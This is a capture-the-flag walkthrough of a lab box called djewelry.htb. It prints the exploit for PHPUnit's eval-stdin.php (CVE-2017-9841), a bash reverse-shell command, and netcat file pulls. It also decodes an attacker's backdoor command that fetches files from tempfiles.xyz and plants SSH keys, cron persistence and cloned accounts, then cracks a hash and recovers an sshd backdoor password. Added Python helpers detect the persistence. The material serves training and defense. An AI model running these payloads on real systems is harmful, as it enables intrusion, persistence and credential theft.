Engagement flow
Enumeration
We start off with a basic nmap scan and learn of 2 open ports, so the attack surface is narrow.
Web Enumeration
We start off by browsing to the website.
Clicking visit store brings us to
http://store.djewelry.htb/
Looking under the login tab we found a notice that discloses sensitive information.
Directory busting revealed a /vendor/ directory. Taking a look inside it, the application's Composer dependencies are browsable from the web, PHPUnit included.
Initial foothold
Look up CVEs for every PHP module exposed under /vendor/
Determine that PHPUnit is vulnerable
Research and exploit the code injection in eval-stdin.php
Create a reverse shell
Looking for CVEs for PHPUnit was the most attractive route, as it has an easy one right off the bat: CVE-2017-9841, where vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php evaluates whatever PHP is POSTed to it. Any deployment that leaves /vendor/ web-accessible therefore hands out code execution.
Looking around I found this payload here
https://gist.github.com/yassineaboukir/1501de6f60dce148824d3001e83fb263
A first probe that only proves the request body is being evaluated as PHP:
curl --data "<?php echo(pi());" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
The command to run has to go inside the PHP body: appending "; echo id" after the curl command only runs on the attacking machine, not on the target. Swapping echo for system() executes the command on the server, and it worked:
curl --data "<?php system('id');" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
From here we can execute a reverse shell with the following:
curl --data "<?php system(\"bash -c 'bash -i >& /dev/tcp/10.10.14.14/6363 0>&1'\");" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
USER
Observe the file "info" in the /var/backups folder
cat the file and extract the hex string
Decode it in CyberChef
Crack the hash
Log in as the user
From here we noticed that we could execute a binary in the /var/backups folder: a file named info, owned by www-data and readable and executable only by that user.
www-data@production:/var/backups$ ls -la
total 736
drwxr-xr-x 2 root root 4096 Jul 2 06:25 .
drwxr-xr-x 13 root root 4096 Feb 8 19:59 ..
-rw-r--r-- 1 root root 51200 Jul 2 06:25 alternatives.tar.0
-rw-r--r-- 1 root root 34011 Feb 8 19:05 apt.extended_states.0
-rw-r--r-- 1 root root 268 Jun 4 2021 dpkg.diversions.0
-rw-r--r-- 1 root root 172 Jul 4 2021 dpkg.statoverride.0
-rw-r--r-- 1 root root 615929 Feb 8 19:06 dpkg.status.0
-r-x------ 1 www-data www-data 27296 May 14 2021 info
www-data@production:/var/backups$
Running cat on the binary (strings is the cleaner tool here) and checking the tail of the output reveals a long hexadecimal string handed to /bin/bash -c. We can paste that string into CyberChef. The relevant strings, with the hex itself elided:
ffff/bin/bash-…[-] fork()/etc/shadow[.] checking if we got root[-] something went wrong =([+] got r00t ^_^[-] unshare(CLONE_NEWUSER)deny/proc/self/setgroups[-] write_file(/proc/self/set_groups)0 %d 1
The string begins with a c, which is actually the -c flag of the bash command the binary runs (bash -c <payload>) rather than part of the encoded data. Removing it, the remainder hex-decodes to:
wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;
The decoded command appends an entry to /etc/shadow, and in it we have a hash. I used hashid to confirm the type once the hash was properly formatted: at first I had no success, until I realised the $ signs were escaped with backslashes so they would survive being passed through the bash command. With those removed, hashid identified it as SHA-512 Crypt ($6$). I was able to crack the hash and connect in over SSH as the user steven.
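Pulling the hash out of the decoded command and hunting for what that command leaves behind, as an added example that is not part of the original writeup. The command string is the one decoded above; the /etc/passwd and /etc/crontab contents are constructed samples of a host after it has run, not captures from the box.

```python
"""Added example: extract the planted sha512crypt hash and detect the
persistence the /var/backups/info payload installs (cloned account with a
duplicate UID, cron job running a dotfile out of /var/lib).
"""
import re
from collections import defaultdict

# The command as decoded on this page.
BACKDOOR_CMD = r"""wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;"""

# crypt(3) sha512crypt: $6$<salt up to 16 chars>$<86 chars of ./0-9A-Za-z>
SHA512CRYPT = re.compile(r"\$6\$([./0-9A-Za-z]{1,16})\$([./0-9A-Za-z]{86})")


def planted_shadow_hash(cmd: str) -> str:
    """Return the $6$ hash the command echoes into /etc/shadow.

    The $ signs are backslash-escaped inside the awk program so bash does not
    expand them; stripping the escapes is the step hashid needed too.
    """
    m = SHA512CRYPT.search(cmd.replace("\\$", "$"))
    if m is None:
        raise ValueError("no sha512crypt hash found")
    return m.group(0)


def hash_fields(h: str) -> tuple:
    """Split a modular-crypt string into (id, salt, digest)."""
    _, ident, salt, digest = h.split("$")
    return ident, salt, digest


def hashcat_command(h: str, wordlist: str = "rockyou.txt") -> str:
    """sha512crypt is hashcat mode 1800."""
    return f"hashcat -m 1800 '{h}' {wordlist}"


def duplicate_uid_accounts(passwd_text: str) -> dict:
    """Map UID -> account names for every UID that appears more than once.

    The payload copies an existing user's passwd line as "<name>1" with the
    same UID and home directory, so the clone shows up as a UID collision.
    """
    by_uid = defaultdict(list)
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) == 7:
            by_uid[parts[2]].append(parts[0])
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


WRITABLE_PREFIXES = ("/var/", "/tmp/", "/dev/shm/", "/home/")


def suspicious_cron(crontab_text: str) -> list:
    """System crontab entries whose program is a dotfile or lives under a
    writable data directory, such as "* 3 * * * root /var/lib/.main"."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line[0] not in "0123456789*@":
            continue  # comments, blanks and VAR=value lines
        if line.startswith("@"):      # @reboot user command
            parts, cmd_idx = line.split(None, 2), 2
        else:                         # m h dom mon dow user command
            parts, cmd_idx = line.split(None, 6), 6
        if len(parts) <= cmd_idx:
            continue
        program = parts[cmd_idx].split()[0]
        basename = program.rsplit("/", 1)[-1]
        if program.startswith(WRITABLE_PREFIXES) or basename.startswith("."):
            hits.append(line)
    return hits


# Constructed post-compromise samples (not captures from the box).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
steven:x:1000:1000::/home/steven:/bin/bash
steven1:x:1000:1000:,,,:/home/steven:/bin/bash
"""
SAMPLE_CRONTAB = """SHELL=/bin/sh
17 *\t* * *\troot\tcd / && run-parts --report /etc/cron.hourly
* 3 * * * root /var/lib/.main
"""

if __name__ == "__main__":
    h = planted_shadow_hash(BACKDOOR_CMD)
    print("planted hash:", h)
    print(hashcat_command(h))
    print("duplicate UIDs:", duplicate_uid_accounts(SAMPLE_PASSWD))
    print("suspicious cron:", suspicious_cron(SAMPLE_CRONTAB))
```

The two detection checks are the ones worth running on any host that executed this payload: the awk clause selects every interactive user with UID >= 1000, so each of them gets a "<name>1" twin sharing their UID, and the cron line runs /var/lib/.main as root every minute of the 03:00 hour. The authorized_keys overwrite in the first wget is a third indicator, checked by simply reading /root/.ssh/authorized_keys.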
Root
Internal enumeration with linpeas
Browse to /var/mail and read the internal note
Identify mod_reader.so and run strings on it looking for an encoded command
Download the sshd binary
Decompile it and extract the password from the backdoored sshd
We browse to /var/mail and find this note.
Hi Steven.
We recently updated the system but are still experiencing some strange behaviour with the Apache service.
We have temporarily moved the web store and database to another server whilst investigations are underway.
If for any reason you need access to the database or web application code, get in touch with Mark and he
will generate a temporary password for you to authenticate to the temporary server.
Thanks,
sysadmin
My first instinct is to check the apache2 logs, but we have access to none of them. Looking through /etc/apache2 instead, one entry in mods-enabled stands out as newly added: mod_reader. We also notice a recently added file at /usr/sbin/sshd.
To analyse the module offline we pull it over netcat, starting the listener on the attacking machine first and then pushing the file from the target:
nc -nlvp 2323 > mod_reader.so
nc -w 1 10.10.14.14 2323 < /usr/lib/apache2/modules/mod_reader.so
Looking through mod_reader.so turned up nothing, so we move on to the sshd binary and transfer it the same way:
nc -nlvp 2323 > sshd
nc -w 1 10.10.14.14 2323 < /usr/sbin/sshd
We analyse this file with static binary analysis (strings and the symbol table) and learn of auth_password, the function that checks a user's password. Opening the file in Ghidra and searching for auth_password reveals a backdoor: a local 31-byte buffer named backdoor is filled with hard-coded values before the password check.
We have to reassemble the buffer in CyberChef, working from the top memory address of the backdoor payload in Ghidra downwards. Ghidra fills the array piecewise: backdoor._0_4_, _4_4_, _8_4_, _12_4_, _16_8_, _24_4_ and _28_2_ are the 4-, 8- and 2-byte words at those offsets, and backdoor[30] = -0x5b is the last byte, which as an unsigned char is 0xa5 (0x100 - 0x5b), so 0xa5 goes on top as it represents the final element of our 31-byte payload. Each word is printed as a little-endian integer, so its bytes sit in memory in the reverse of the printed order. Listing 0xa5 and then each word from offset 28 down to offset 0 enumerates every byte from offset 30 back to offset 0, which is why a single Swap endianness with a word length of 31 (as per the size of the Ghidra backdoor variable) puts the whole buffer into memory order. We remove the pad incomplete words option.
We add From Hex with a space delimiter. We then learned, thanks to the forums, that the bytes are XORed before the comparison, and we could see the key 0x96 next to the XOR in the decompiled function. XORing the 31 bytes with 0x96 provided our final password :)
0xa5
0xa9f4
0xbcf0b5e3
0xb2d6f4a0fda0b3d6
0xfdb3d6e7
0xf7bbfdc8
0xa4b3a3f3
0xf0e7abd6
backdoor._28_2_ = 0xa9f4;
ppVar1 = ctxt->pw;
iVar8 = ctxt->valid;
backdoor._24_4_ = 0xbcf0b5e3;
backdoor._16_8_ = 0xb2d6f4a0fda0b3d6;
backdoor[30] = -0x5b;
backdoor._0_4_ = 0xf0e7abd6;
backdoor._4_4_ = 0xa4b3a3f3;
backdoor._8_4_ = 0xf7bbfdc8;
backdoor._12_4_ = 0xfdb3d6e7;
Once we have ordered the payload,
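The same reassembly done in Python, as an added example that is not part of the original writeup, so the CyberChef recipe can be checked step by step. The constants are the Ghidra assignments shown above and the 0x96 key the writeup found next to the XOR; the function names are this example's own.

```python
"""Added example: rebuild the sshd backdoor password from the Ghidra output.

Ghidra prints each piece of the 31-byte `backdoor` buffer as a little-endian
integer (backdoor._<offset>_<size>_), so every word's bytes must be reversed
into memory order; backdoor[30] = -0x5b is a signed char whose byte value is
0xa5; the buffer is then XORed with the single-byte key 0x96.
"""
import struct

BUFFER_LEN = 31
XOR_KEY = 0x96

# (offset, size in bytes, value) exactly as the decompiler renders them
BACKDOOR_WORDS = [
    (0, 4, 0xF0E7ABD6),
    (4, 4, 0xA4B3A3F3),
    (8, 4, 0xF7BBFDC8),
    (12, 4, 0xFDB3D6E7),
    (16, 8, 0xB2D6F4A0FDA0B3D6),
    (24, 4, 0xBCF0B5E3),
    (28, 2, 0xA9F4),
]
BACKDOOR_TAIL = (30, -0x5B)  # backdoor[30] = -0x5b


def memory_image() -> bytes:
    """Lay the words out as they sit in memory: little-endian, at their offsets."""
    fmt = {2: "<H", 4: "<I", 8: "<Q"}
    buf = bytearray(BUFFER_LEN)
    for off, size, value in BACKDOOR_WORDS:
        buf[off:off + size] = struct.pack(fmt[size], value)
    off, value = BACKDOOR_TAIL
    buf[off] = value & 0xFF  # -0x5b as an unsigned char is 0xa5
    return bytes(buf)


def cyberchef_input() -> str:
    """The hex the writeup pastes into CyberChef: the tail byte, then each word
    from the highest offset down, each written as Ghidra prints it. That lists
    the bytes from offset 30 back to offset 0, which is why one 31-byte
    endianness swap puts them in memory order."""
    parts = [f"{BACKDOOR_TAIL[1] & 0xFF:02x}"]
    for off, size, value in sorted(BACKDOOR_WORDS, reverse=True):
        parts.append(f"{value:0{size * 2}x}")
    return "".join(parts)


def swap_endianness(hexstr: str, word_len: int) -> bytes:
    """CyberChef's Swap endianness with padding off: reverse each word_len-byte word."""
    raw = bytes.fromhex(hexstr)
    out = bytearray()
    for i in range(0, len(raw), word_len):
        out += raw[i:i + word_len][::-1]
    return bytes(out)


def decode_password(image: bytes, key: int = XOR_KEY) -> str:
    """XOR every byte with the single-byte key and read it as ASCII."""
    return bytes(b ^ key for b in image).decode("ascii")


if __name__ == "__main__":
    assert swap_endianness(cyberchef_input(), BUFFER_LEN) == memory_image()
    print(decode_password(memory_image()))
```

Both routes, the CyberChef-style reversal of the concatenated hex and the direct little-endian layout, must produce the same 31 bytes before the XOR; if they differ, a word was copied with the wrong width or the -0x5b sign was mishandled. Every byte of the result XORs to printable ASCII, which is a quick sanity check that 0x96 is the right key.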